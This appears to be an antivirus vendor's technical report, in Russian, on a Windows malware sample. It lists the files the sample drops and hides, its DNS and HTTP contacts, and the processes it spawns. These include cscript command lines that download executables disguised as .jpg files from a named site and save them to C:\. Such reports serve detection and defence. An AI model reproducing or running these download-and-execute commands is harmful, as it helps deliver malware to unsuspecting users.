Техническая информация
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\znwb76.exe
- <Текущая директория>\2345.bat
- <Текущая директория>\2345.vbs
- %WINDIR%\chenpath.chh
- %WINDIR%\chenpatt.chh
- D:\chenhu\chenpath.chh
- %TEMP%\sleep80000.vbs
Присваивает атрибут 'скрытый' для следующих файлов
- <Текущая директория>\znwb76.exe
- <Текущая директория>\2345.bat
- <Текущая директория>\2345.vbs
Сетевая активность
Подключается к
- 'sr##8.com':80
UDP
- DNS ASK sr##8.com
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
Создает и запускает на исполнение
- '<Текущая директория>\znwb76.exe'
- '%WINDIR%\syswow64\wscript.exe' "<Текущая директория>\2345.vbs"
- '%WINDIR%\syswow64\cscript.exe' -nologo -e:jscript "<Текущая директория>\2345.bat" "http://www.sr198.com/2345pack_ktykj_v3.2.exe.jpg" "c:\2345pack_ktykj_v3.2.exe"
- '%WINDIR%\syswow64\cscript.exe' -nologo -e:jscript "<Текущая директория>\2345.bat" "http://www.sr198.com/QQExltele.exe.jpg" "c:\qqexltele.exe"
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\sleep80000.vbs"
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c 2345.bat (со скрытым окном)
